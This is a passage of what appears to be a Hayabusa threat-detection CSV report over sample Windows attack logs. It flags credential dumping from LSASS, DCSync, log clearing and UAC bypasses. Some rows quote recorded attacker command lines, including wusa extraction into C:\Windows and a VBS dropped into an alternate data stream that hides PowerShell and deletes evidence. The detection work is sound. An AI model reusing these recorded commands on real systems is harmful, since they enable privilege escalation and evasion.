365ABB72-B181-5CC8-0000-001023C41E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.543 +00:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.543 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.543 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 22:48:58.901 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:48:59.260 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:08.760 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:09.760 +00:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:09.760 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:10.198 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:10.198 +00:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation_sysmon/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:52:27.588 +00:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:52:27.588 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:52:27.588 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 14:48:53.950 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:48:53.950 +00:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 17:21:42.678 +00:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-03 15:20:20.711 +00:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-03 15:20:27.359 +00:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-03 15:20:28.308 +00:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 03:00:11.778 +00:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 03:00:37.572 +00:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 03:00:37.583 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 03:00:37.586 +00:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 01:59:28.669 +00:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:28.684 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:28.684 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:28.950 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,rules/sigma/process_creation_sysmon/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 02:00:01.794 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 02:07:51.131 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:07:51.131 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:07:56.149 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:08:00.446 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:08:00.446 +00:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:52:18.765 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.844 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.922 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.953 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.969 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:19.250 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.250 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.265 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.281 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.297 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.594 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_sysmon/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 